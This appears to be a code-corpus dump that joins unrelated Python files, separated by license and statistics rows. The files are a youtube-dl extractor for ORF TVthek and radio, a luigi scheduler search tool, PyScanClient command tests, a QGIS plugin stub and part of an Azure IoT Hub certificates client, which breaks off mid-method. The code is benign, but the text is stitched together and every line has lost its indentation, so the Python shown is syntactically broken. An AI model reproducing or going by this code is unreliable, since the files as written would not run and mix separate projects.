'url': 'http://tvthek.orf.at/program/Aufgetischt/2745173/Aufgetischt-Mit-der-Steirischen-Tafelrunde/8891389',
'playlist': [{
'md5': '2942210346ed779588f428a92db88712',
'info_dict': {
'id': '8896777',
'ext': 'mp4',
'title': 'Aufgetischt: Mit der Steirischen Tafelrunde',
'description': 'md5:c1272f0245537812d4e36419c207b67d',
'duration': 2668,
'upload_date': '20141208',
},
}],
'skip': 'Blocked outside of Austria / Germany',
}, {
'url': 'http://tvthek.orf.at/topic/Im-Wandel-der-Zeit/8002126/Best-of-Ingrid-Thurnher/7982256',
'info_dict': {
'id': '7982259',
'ext': 'mp4',
'title': 'Best of Ingrid Thurnher',
'upload_date': '20140527',
'description': 'Viele Jahre war Ingrid Thurnher das "Gesicht" der ZIB 2. Vor ihrem Wechsel zur ZIB 2 im Jahr 1995 moderierte sie unter anderem "Land und Leute", "Österreich-Bild" und "Niederösterreich heute".',
},
'params': {
'skip_download': True, # rtsp downloads
},
'_skip': 'Blocked outside of Austria / Germany',
}, {
'url': 'http://tvthek.orf.at/topic/Fluechtlingskrise/10463081/Heimat-Fremde-Heimat/13879132/Senioren-betreuen-Migrantenkinder/13879141',
'skip_download': True,
}, {
'url': 'http://tvthek.orf.at/profile/Universum/35429',
'skip_download': True,
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
data_jsb = self._parse_json(
self._search_regex(
r'<div[^>]+class=(["\']).*?VideoPlaylist.*?\1[^>]+data-jsb=(["\'])(?P<json>.+?)\2',
webpage, 'playlist', group='json'),
playlist_id, transform_source=unescapeHTML)['playlist']['videos']
def quality_to_int(s):
m = re.search('([0-9]+)', s)
if m is None:
return -1
return int(m.group(1))
entries = []
for sd in data_jsb:
video_id, title = sd.get('id'), sd.get('title')
if not video_id or not title:
continue
video_id = compat_str(video_id)
formats = [{
'preference': -10 if fd['delivery'] == 'hls' else None,
'format_id': '%s-%s-%s' % (
fd['delivery'], fd['quality'], fd['quality_string']),
'url': fd['src'],
'protocol': fd['protocol'],
'quality': quality_to_int(fd['quality']),
} for fd in sd['sources']]
# Check for geoblocking.
# There is a property is_geoprotection, but that's always false
geo_str = sd.get('geoprotection_string')
if geo_str:
try:
http_url = next(
f['url']
for f in formats
if re.match(r'^https?://.*\.mp4$', f['url']))
except StopIteration:
pass
else:
req = HEADRequest(http_url)
self._request_webpage(
req, video_id,
note='Testing for geoblocking',
errnote=((
'This video seems to be blocked outside of %s. '
'You may want to try the streaming-* formats.')
% geo_str),
fatal=False)
self._check_formats(formats, video_id)
self._sort_formats(formats)
subtitles = {}
for sub in sd.get('subtitles', []):
sub_src = sub.get('src')
if not sub_src:
continue
subtitles.setdefault(sub.get('lang', 'de-AT'), []).append({
'url': sub_src,
})
upload_date = unified_strdate(sd.get('created_date'))
entries.append({
'_type': 'video',
'id': video_id,
'title': title,
'formats': formats,
'subtitles': subtitles,
'description': sd.get('description'),
'duration': int_or_none(sd.get('duration_in_seconds')),
'upload_date': upload_date,
'thumbnail': sd.get('image_full_url'),
})
return {
'_type': 'playlist',
'entries': entries,
'id': playlist_id,
}
class ORFRadioIE(InfoExtractor):
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
station = mobj.group('station')
show_date = mobj.group('date')
show_id = mobj.group('show')
if station == 'fm4':
show_id = '4%s' % show_id
data = self._download_json(
'http://audioapi.orf.at/%s/api/json/current/broadcast/%s/%s' % (station, show_id, show_date),
show_id
)
def extract_entry_dict(info, title, subtitle):
return {
'id': info['loopStreamId'].replace('.mp3', ''),
'url': 'http://loopstream01.apa.at/?channel=%s&id=%s' % (station, info['loopStreamId']),
'title': title,
'description': subtitle,
'duration': (info['end'] - info['start']) / 1000,
'timestamp': info['start'] / 1000,
'ext': 'mp3'
}
entries = [extract_entry_dict(t, data['title'], data['subtitle']) for t in data['streams']]
return {
'_type': 'playlist',
'id': show_id,
'title': data['title'],
'description': data['subtitle'],
'entries': entries
}
class ORFFM4IE(ORFRadioIE):
IE_NAME = 'orf:fm4'
IE_DESC = 'radio FM4'
_VALID_URL = r'https?://(?P<station>fm4)\.orf\.at/player/(?P<date>[0-9]+)/(?P<show>\w+)'
_TEST = {
'url': 'http://fm4.orf.at/player/20170107/CC',
'md5': '2b0be47375432a7ef104453432a19212',
'info_dict': {
'id': '2017-01-07_2100_tl_54_7DaysSat18_31295',
'ext': 'mp3',
'title': 'Solid Steel Radioshow',
'description': 'Die Mixshow von Coldcut und Ninja Tune.',
'duration': 3599,
'timestamp': 1483819257,
'upload_date': '20170107',
},
'skip': 'Shows from ORF radios are only available for 7 days.'
}
class ORFOE1IE(ORFRadioIE):
IE_NAME = 'orf:oe1'
IE_DESC = 'Radio Österreich 1'
_VALID_URL = r'https?://(?P<station>oe1)\.orf\.at/player/(?P<date>[0-9]+)/(?P<show>\w+)'
_TEST = {
'url': 'http://oe1.orf.at/player/20170108/456544',
'md5': '34d8a6e67ea888293741c86a099b745b',
'info_dict': {
'id': '2017-01-08_0759_tl_51_7DaysSun6_256141',
'ext': 'mp3',
'title': 'Morgenjournal',
'duration': 609,
'timestamp': 1483858796,
'upload_date': '20170108',
},
'skip': 'Shows from ORF radios are only available for 7 days.'
}
class ORFIPTVIE(InfoExtractor):
IE_NAME = 'orf:iptv'
IE_DESC = 'iptv.ORF.at'
_VALID_URL = r'https?://iptv\.orf\.at/(?:#/)?stories/(?P<id>\d+)'
_TEST = {
'url': 'http://iptv.orf.at/stories/2275236/',
'md5': 'c8b22af4718a4b4af58342529453e3e5',
'info_dict': {
'id': '350612',
'ext': 'flv',
'title': 'Weitere Evakuierungen um Vulkan Calbuco',
'description': 'md5:d689c959bdbcf04efeddedbf2299d633',
'duration': 68.197,
'thumbnail': r're:^https?://.*\.jpg$',
'upload_date': '20150425',
},
}
def _real_extract(self, url):
story_id = self._match_id(url)
webpage = self._download_webpage(
'http://iptv.orf.at/stories/%s' % story_id, story_id)
video_id = self._search_regex(
r'data-video(?:id)?="(\d+)"', webpage, 'video id')
data = self._download_json(
'http://bits.orf.at/filehandler/static-api/json/current/data.json?file=%s' % video_id,
video_id)[0]
duration = float_or_none(data['duration'], 1000)
video = data['sources']['default']
load_balancer_url = video['loadBalancerUrl']
abr = int_or_none(video.get('audioBitrate'))
vbr = int_or_none(video.get('bitrate'))
fps = int_or_none(video.get('videoFps'))
width = int_or_none(video.get('videoWidth'))
height = int_or_none(video.get('videoHeight'))
thumbnail = video.get('preview')
rendition = self._download_json(
load_balancer_url, video_id, transform_source=strip_jsonp)
f = {
'abr': abr,
'vbr': vbr,
'fps': fps,
'width': width,
'height': height,
}
formats = []
for format_id, format_url in rendition['redirect'].items():
if format_id == 'rtmp':
ff = f.copy()
ff.update({
'url': format_url,
'format_id': format_id,
})
formats.append(ff)
elif determine_ext(format_url) == 'f4m':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_id))
elif determine_ext(format_url) == 'm3u8':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4', m3u8_id=format_id))
else:
continue
self._sort_formats(formats)
title = remove_end(self._og_search_title(webpage), ' - iptv.ORF.at')
description = self._og_search_description(webpage)
upload_date = unified_strdate(self._html_search_meta(
'dc.date', webpage, 'upload date'))
return {
'id': video_id,
'title': title,
'description': description,
'duration': duration,
'thumbnail': thumbnail,
'upload_date': upload_date,
'formats': formats,
}
| gpl-3.0 | 2,996,429,475,487,731,000 | 8,071,703,934,864,872,000 | 34.135922 | 222 | 0.495072 | false |
Viktor-Evst/fixed-luigi | luigi/tools/luigi_grep.py | 12 | 2854 | #!/usr/bin/env python
import argparse
import json
from collections import defaultdict
from luigi import six
from luigi.six.moves.urllib.request import urlopen
class LuigiGrep(object):
def __init__(self, host, port):
self._host = host
self._port = port
@property
def graph_url(self):
return "http://{0}:{1}/api/graph".format(self._host, self._port)
def _fetch_json(self):
"""Returns the json representation of the dep graph"""
print("Fetching from url: " + self.graph_url)
resp = urlopen(self.graph_url).read()
return json.loads(resp.decode('utf-8'))
def _build_results(self, jobs, job):
job_info = jobs[job]
deps = job_info['deps']
deps_status = defaultdict(list)
for j in deps:
if j in jobs:
deps_status[jobs[j]['status']].append(j)
else:
deps_status['UNKNOWN'].append(j)
return {"name": job, "status": job_info['status'], "deps_by_status": deps_status}
def prefix_search(self, job_name_prefix):
"""searches for jobs matching the given job_name_prefix."""
json = self._fetch_json()
jobs = json['response']
for job in jobs:
if job.startswith(job_name_prefix):
yield self._build_results(jobs, job)
def status_search(self, status):
"""searches for jobs matching the given status"""
json = self._fetch_json()
jobs = json['response']
for job in jobs:
job_info = jobs[job]
if job_info['status'].lower() == status.lower():
yield self._build_results(jobs, job)
def main():
parser = argparse.ArgumentParser(
"luigi-grep is used to search for workflows using the luigi scheduler's json api")
parser.add_argument(
"--scheduler-host", default="localhost", help="hostname of the luigi scheduler")
parser.add_argument(
"--scheduler-port", default="8082", help="port of the luigi scheduler")
parser.add_argument("--prefix", help="prefix of a task query to search for", default=None)
parser.add_argument("--status", help="search for jobs with the given status", default=None)
args = parser.parse_args()
grep = LuigiGrep(args.scheduler_host, args.scheduler_port)
results = []
if args.prefix:
results = grep.prefix_search(args.prefix)
elif args.status:
results = grep.status_search(args.status)
for job in results:
print("{name}: {status}, Dependencies:".format(name=job['name'], status=job['status']))
for (status, jobs) in six.iteritems(job['deps_by_status']):
print(" status={status}".format(status=status))
for job in jobs:
print(" {job}".format(job=job))
if __name__ == '__main__':
main()
| apache-2.0 | 2,943,911,845,265,211,000 | 8,754,499,670,123,700,000 | 32.97619 | 95 | 0.600561 | false |
PythonScanClient/PyScanClient | Test/test_commands.py | 1 | 14881 | from __future__ import print_function
import unittest
import xml.etree.ElementTree as ET
from scan.commands import *
# These tests compare the XML as strings, even though for example
# both "<comment><text>Hello</text></comment>"
# and "<comment>\n <text>Hello</text>\n</comment>"
# would be acceptable XML representations.
# Changes to the XML could result in the need to update the tests.
class CommandTest(unittest.TestCase):
def testXMLEscape(self):
# Basic comment
cmd = Comment("Hello")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<comment><text>Hello</text></comment>")
# Check proper escape of "less than"
cmd = Comment("Check for current < 10")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<comment><text>Check for current < 10</text></comment>")
def testDelayCommand(self):
# Basic set
cmd = Delay(47.11)
print(cmd)
self.assertEqual(str(cmd), "Delay(47.11)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<delay><seconds>47.11</seconds></delay>")
def testConfig(self):
# Basic set
cmd = ConfigLog(True)
print(cmd)
self.assertEqual(str(cmd), "ConfigLog(True)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<config_log><automatic>true</automatic></config_log>")
def testSetCommand(self):
# Basic set
cmd = Set("some_device", 3.14)
print(cmd)
self.assertEqual(str(cmd), "Set('some_device', 3.14)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><wait>false</wait></set>")
# Handle numeric as well as string for value
cmd = Set("some_device", "Text")
print(cmd)
self.assertEqual(str(cmd), "Set('some_device', 'Text')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>\"Text\"</value><wait>false</wait></set>")
# With completion
cmd = Set("some_device", 3.14, completion=True)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>false</wait></set>")
# .. and timeout
cmd = Set("some_device", 3.14, completion=True, timeout=5.0)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>false</wait><timeout>5.0</timeout></set>")
# Setting a readback PV (the default one) enables wait-on-readback
cmd = Set("some_device", 3.14, completion=True, readback=True, tolerance=1, timeout=10.0)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>some_device</readback><tolerance>1</tolerance><timeout>10.0</timeout></set>")
# Setting a readback PV (a specific one) enables wait-on-readback
cmd = Set("some_device", 3.14, completion=True, readback="some_device.RBV", tolerance=1, timeout=10.0)
print(cmd)
self.assertEqual(str(cmd), b"Set('some_device', 3.14, completion=True, timeout=10.0, readback='some_device.RBV', tolerance=1.000000)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>some_device.RBV</readback><tolerance>1</tolerance><timeout>10.0</timeout></set>")
# Readback value different from the written value
cmd = Set("some_device", 3.14, completion=True, readback="other_device", readback_value=1, tolerance=1, timeout=10.0)
print(cmd)
self.assertEqual(str(cmd), b"Set('some_device', 3.14, completion=True, timeout=10.0, readback='other_device', readback_value=1, tolerance=1.000000)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>other_device</readback><readback_value>1</readback_value><tolerance>1</tolerance><timeout>10.0</timeout></set>")
# Readback value uses string
cmd = Set("some_device", 3.14, completion=True, readback="status", readback_value='OK', tolerance=0, timeout=10.0)
print(cmd)
self.assertEqual(str(cmd), b"Set('some_device', 3.14, completion=True, timeout=10.0, readback='status', readback_value='OK')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>status</readback><readback_value>\"OK\"</readback_value><tolerance>0</tolerance><timeout>10.0</timeout></set>")
def testSequence(self):
# Nothing
cmd = Sequence()
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<sequence />")
# A few
cmd = Sequence(Comment("One"), Comment("Two"))
print(cmd.format())
self.assertEqual(ET.tostring(cmd.genXML()), b"<sequence><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></sequence>")
# Sequences are 'flattened'
s1 = Sequence(Comment("One"), Comment("Two"))
s2 = Sequence(Comment("Four"), Comment("Five"))
seq1 = Sequence(s1, Comment("Three"), s2)
print(seq1.format())
seq2 = Sequence(Comment("One"), Comment("Two"), Comment("Three"), s2)
print(seq2.format())
self.assertEqual(ET.tostring(seq1.genXML()), ET.tostring(seq2.genXML()) )
def testParallel(self):
# Nothing
cmd = Parallel()
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel />")
# A few
cmd = Parallel(Comment("One"), Comment("Two"))
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
# .. as list
cmds = Comment("One"), Comment("Two")
cmd = Parallel(cmds)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
cmd = Parallel(body=cmds)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
# With other parameters
cmd = Parallel(cmds, timeout=10)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><timeout>10</timeout><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
cmd = Parallel(cmds, errhandler="MyHandler")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body><error_handler>MyHandler</error_handler></parallel>")
cmd = Parallel()
cmd.append(Comment("One"), Comment("Two"))
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
def testLog(self):
# One device
cmd = Log("pv1")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log><devices><device>pv1</device></devices></log>")
# Nothing
cmd = Log()
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log />")
# Several
cmd = Log("pv1", "pv2", "pv3")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log><devices><device>pv1</device><device>pv2</device><device>pv3</device></devices></log>")
# .. provided as list
devices_to_log = [ "pv1", "pv2", "pv3" ]
cmd = Log(devices_to_log)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log><devices><device>pv1</device><device>pv2</device><device>pv3</device></devices></log>")
def testInclude(self):
cmd = Include("start.scn")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<include><scan_file>start.scn</scan_file></include>")
cmd = Include("start.scn", "macro=value")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<include><scan_file>start.scn</scan_file><macros>macro=value</macros></include>")
def testScript(self):
cmd = Script("MyCustomScript")
print(cmd)
self.assertEqual(str(cmd), "Script('MyCustomScript')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<script><path>MyCustomScript</path></script>")
cmd = Script("MyCustomCommand", "arg1", 42.3)
print(cmd)
self.assertEqual(str(cmd), "Script('MyCustomCommand', 'arg1', 42.3)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<script><path>MyCustomCommand</path><arguments><argument>arg1</argument><argument>42.3</argument></arguments></script>")
# Arguments already provided as list
cmd = Script("MyCustomCommand", [ "arg1", 42.3 ])
print(cmd)
self.assertEqual(str(cmd), "Script('MyCustomCommand', 'arg1', 42.3)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<script><path>MyCustomCommand</path><arguments><argument>arg1</argument><argument>42.3</argument></arguments></script>")
def testWait(self):
cmd = Wait('device', 3.14)
print(cmd)
self.assertEqual(str(cmd), "Wait('device', 3.14)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<wait><device>device</device><value>3.14</value><comparison>EQUALS</comparison></wait>")
cmd = Wait('counts', 1000, comparison='increase by', timeout=5.0, errhandler='someHandler')
print(cmd)
self.assertEqual(str(cmd), "Wait('counts', 1000, comparison='increase by', timeout=5, errhandler='someHandler')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<wait><device>counts</device><value>1000</value><comparison>INCREASE_BY</comparison><timeout>5.0</timeout><error_handler>someHandler</error_handler></wait>")
def testIf(self):
cmd = If('device', '>', 3.14)
print(cmd)
self.assertEqual(str(cmd), "If('device', '>', 3.14, tolerance=0.1)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<if><device>device</device><comparison>ABOVE</comparison><value>3.14</value><tolerance>0.1</tolerance><body /></if>")
cmd = If('device', '>', 3.14, [ Comment('BODY') ])
print(cmd)
self.assertEqual(str(cmd), "If('device', '>', 3.14, [ Comment('BODY') ], tolerance=0.1)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<if><device>device</device><comparison>ABOVE</comparison><value>3.14</value><tolerance>0.1</tolerance><body><comment><text>BODY</text></comment></body></if>")
def testLoop(self):
cmd = Loop('pv1', 1, 10, 0.1)
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><wait>false</wait><body /></loop>")
cmd = Loop('pv1', 1, 10, 0.1, Delay(5))
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, [ Delay(5) ])")
cmd = Loop('pv1', 1, 10, 0.1, Delay(1), Delay(2))
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, [ Delay(1), Delay(2) ])")
cmd = Loop('pv1', 1, 10, 0.1, body= [ Delay(1), Delay(2) ])
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, [ Delay(1), Delay(2) ])")
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><wait>false</wait><body><delay><seconds>1</seconds></delay><delay><seconds>2</seconds></delay></body></loop>")
cmd = Loop('pv1', 1, 10, 0.1, Delay(1), Delay(2), readback=True)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><wait>true</wait><readback>pv1</readback><tolerance>0.01</tolerance><body><delay><seconds>1</seconds></delay><delay><seconds>2</seconds></delay></body></loop>")
cmd = Loop('pv1', 1, 10, 0.1, completion=True, timeout=10)
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, completion=True, timeout=10)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><completion>true</completion><wait>false</wait><timeout>10</timeout><body /></loop>")
def testXMLSequence(self):
cmds = CommandSequence()
print(cmds)
self.assertEqual(len(cmds), 0)
print(cmds.genSCN())
cmds = CommandSequence(Comment('One'))
print(cmds)
self.assertEqual(len(cmds), 1)
print(cmds.genSCN())
cmds = CommandSequence(Comment('One'), Comment('Two'))
print(cmds)
self.assertEqual(len(cmds), 2)
print(cmds.genSCN())
self.assertEqual(b"<commands><comment><text>One</text></comment><comment><text>Two</text></comment></commands>",
cmds.genSCN().replace(b"\n", b"").replace(b" ", b""))
cmds = CommandSequence(Comment('One'))
cmds.append(Comment('Two'))
print(cmds)
self.assertEqual(len(cmds), 2)
print(cmds.genSCN())
cmds = CommandSequence( ( Comment('One'), Comment('Two') ) )
print(cmds)
self.assertEqual(len(cmds), 2)
print(cmds.genSCN())
cmds = CommandSequence(Comment('Example'), Loop('pos', 1, 5, 0.5, Set('run', 1), Delay(2), Set('run', 0)))
print(cmds)
def testCommandSequenceFormat(self):
cmds = CommandSequence(Parallel(
Sequence(Comment('Chain1'), Set('run', 1), Delay(2), Set('run', 0)),
Sequence(Comment('Chain2'), Set('foo', 1), Delay(2), Set('foo', 0))
))
print(cmds)
self.assertEqual(str(cmds), "[\n Parallel(\n Sequence(\n Comment('Chain1'),\n Set('run', 1),\n Delay(2),\n Set('run', 0)\n ),\n Sequence(\n Comment('Chain2'),\n Set('foo', 1),\n Delay(2),\n Set('foo', 0)\n )\n )\n]")
def testCommandAbstractMethodsMustBeImplemented(self):
class IncompleteCommand(Command):
pass
self.assertRaises(TypeError, IncompleteCommand)
if __name__ == "__main__":
unittest.main()
| epl-1.0 | -2,978,407,120,462,472,700 | 460,669,125,174,622,900 | 50.670139 | 346 | 0.608628 | false |
GHsimone/LCCS3basicCoder | __init__.py | 1 | 1622 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
LCCS3_BasicCoder
A QGIS plugin
The plugin loads a LCCS3 legend, creates a form with all LCCS3 classes and allows the user to code selected polygons
-------------------
begin : 2015-04-16
copyright : (C) 2015 by Simone Maffei
email : [email protected]
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load LCCS3_BasicCoder class from file LCCS3_BasicCoder.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
#
from .lccs3_basiccoder import LCCS3_BasicCoder
return LCCS3_BasicCoder(iface)
| gpl-2.0 | -6,126,340,916,275,074,000 | 7,600,087,600,670,462,000 | 45.342857 | 117 | 0.422318 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-iothub/azure/mgmt/iothub/operations/certificates_operations.py | 2 | 23304 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class CertificatesOperations(object):
"""CertificatesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
:ivar api_version: The version of the API. Constant value: "2017-07-01".
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-07-01"
self.config = config
def list_by_iot_hub(
self, resource_group_name, resource_name, custom_headers=None, raw=False, **operation_config):
"""Get the certificate list.
Returns the list of certificates.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateListDescription
<azure.mgmt.iothub.models.CertificateListDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateListDescription
<azure.mgmt.iothub.models.CertificateListDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateListDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get(
self, resource_group_name, resource_name, certificate_name, custom_headers=None, raw=False, **operation_config):
"""Get the certificate.
Returns the certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, resource_name, certificate_name, if_match=None, certificate=None, custom_headers=None, raw=False, **operation_config):
"""Upload the certificate to the IoT hub.
Adds new or replaces existing certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate. Do not specify for creating
a brand new certificate. Required to update an existing certificate.
:type if_match: str
:param certificate: base-64 representation of the X509 leaf
certificate .cer file or just .pem file content.
:type certificate: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
certificate_description = models.CertificateBodyDescription(certificate=certificate)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}'
path_format_arguments = {
